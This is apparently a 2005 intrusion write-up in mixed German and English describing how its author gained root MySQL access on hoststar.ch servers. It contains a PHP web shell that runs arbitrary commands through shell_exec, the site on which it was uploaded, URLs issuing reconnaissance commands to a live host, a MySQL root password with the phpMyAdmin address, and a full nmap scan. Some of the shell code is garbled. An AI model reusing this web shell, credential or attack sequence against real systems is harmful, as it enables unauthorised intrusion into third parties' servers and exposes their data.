==================================================== How to gain r00t SQL access on hoststar.ch MySQL Servers ==================================================== Discvovered by: Simon php_admin_value open_basedir /docroot PROBLEM TWO Ausführen von PHP Scripten: Da ich nun weiss das "Safe Mode" nicht aktiv ist, kann ich mittels einem simplen PHP Script Serverbefehle ausführen: Shell.php ------> Shell by z9diac"; echo "\n"; echo "

"; $output = shell_exec($command); $output = str_replace("\xa","
",$output); echo "_START_\n"; echo($output); echo "_END_\n"; /* das ist der alte befehl aus 0.2 system("$command"); */ exit(); ?> <----- Da ich keinen Useraccount auf hoststar.ch habe, fand ich eine Website die mir eine Uploadmöglichkeit gibt: http://www.chlorium.ch/index.php?site=download bzw. dannach: http://www.chlorium.ch/download/shell.php ;) Befehle mittels shell.php ausführen: http://www.chlorium.ch/download/shell.php?command=uname+-a http://www.chlorium.ch/download/shell.php?command=ifconfig http://www.chlorium.ch/download/shell.php?command=finger+root http://www.chlorium.ch/download/shell.php?command=cd+%2Fhome%3B+ls http://www.chlorium.ch/download/shell.php?command=cd+%2Fhome%2Fwww%3B+ls Mir war es nun möglich die MySQL config auszulesen: http://213.133.109.162/phpMyAdmin/ User: root Password: 15mnbs Mittels einem nmap Scan kann ich sagen dass die Services up to date sind: root@z9diac:~# nmap -sS -sV -O hoststar.ch Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2005-07-28 15:05 CEST Interesting ports on tux1.hoststar.ch (213.133.109.162): (The 1647 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 21/tcp open ftp 22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99) 25/tcp open smtp Sendmail 8.12.11/8.12.11 53/tcp open domain ISC Bind 9.2.3 80/tcp open http Apache httpd 1.3.29 ((Unix)) 110/tcp open pop3 UW Imap pop3 server 2003.83 111/tcp open rpcbind 2 (rpc #100000) 143/tcp open imap? 443/tcp open http Apache httpd 1.3.29 ((Unix)) 587/tcp open smtp Sendmail 8.12.11/8.12.11 6667/tcp filtered irc 6969/tcp filtered acmsoda 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port21-TCP:V=3.50%D=7/28%Time=42E8D80C%P=i486-slackware-lin ux-gnu%r(NUL SF:L,17,"220\x20FTP\x20Server\x20ready\.\r\n")%r(GenericLines, 17,"220\x20F SF:TP\x20Server\x20ready\.\r\n")%r(Help,220,"220\x20FTP\x20Server\x20ready SF:\.\r\n214-The\x20following\x20commands\x20are\x20recognized\x20$\*\x20 SF:=>'s\x20unimplemented$:\r\n\x20CWD\x20\x20\x20\x20\x20XCWD\x20\x20\x20 SF:\x20CDUP\x20\x20\x20\x20XCUP\x20\x20\x20\x20SMNT\*\x20\x20\x20QUIT\x20\ SF:x20\x20\x20PORT\x20\x20\x20\x20PASV\x20\x20\x20\x20\r\n\x20EPRT\x20\x20 SF:\x20\x20EPSV\x20\x20\x20\x20ALLO\*\x20\x20\x20RNFR\x20\x20\x20\x20RNTO\ SF:x20\x20\x20\x20DELE\x20\x20\x20\x20MDTM\x20\x20\x20\x20RMD\x20\x20\x20\ SF:x20\x20\r\n\x20XRMD\x20\x20\x20\x20MKD\x20\x20\x20\x20\x20XMKD\x20\x20\ SF:x20\x20PWD\x20\x20\x20\x20\x20XPWD\x20\x20\x20\x20SIZE\x20\x20\x20\x20S SF:YST\x20\x20\x20\x20HELP\x20\x20\x20\x20\r\n\x20NOOP\x20\x20\x20\x20FEAT SF:\x20\x20\x20\x20OPTS\x20\x20\x20\x20AUTH\*\x20\x20\x20CCC\*\x20\x20\x20 SF:\x20CONF\*\x20\x20\x20ENC\*\x20\x20\x20\x20MIC\*\x20\x20\x20\x20\r\n\x2 SF:0PBSZ\*\x20\x20\x20PROT\*\x20\x20\x20TYPE\x20\x20\x20\x20STRU\x20\x20\x SF:20\x20MODE\x20\x20\x20\x20RETR\x20\x20\x20\x20STOR\x20\x20\x20\x20STOU\ SF:x20\x20\x20\x20\r\n\x20APPE\x20\x20\x20\x20REST\x20\x20\x20\x20ABOR\x20 SF:\x20\x20\x20USER\x20\x20\x20\x20PASS\x20\x20\x20\x20ACCT\*\x20\x20\x20R SF:EIN\*\x20\x20\x20LIST\x20\x20\x20\x20\r\n214\x20Direct\x20comments\x20t SF:o\x20technik@login-1\.hoststar\.ch\r\n"); No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi). TCP/IP fingerprint: SInfo(V=3.50%P=i486-slackware-linux-gnu%D=7/28%Time=42E8D82C%O=21%C=1) TSeq(Class=RI%gcd=1%SI=334202%TS=100HZ) TSeq(Class=RI%gcd=1%SI=334879%TS=100HZ) TSeq(Class=RI%gcd=2%SI=19AACF%TS=100HZ) T1(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW) T2(Resp=N) T3(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=) T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) PU(Resp=N) Uptime 0.826 days (since Wed Jul 27 19:16:38 2005)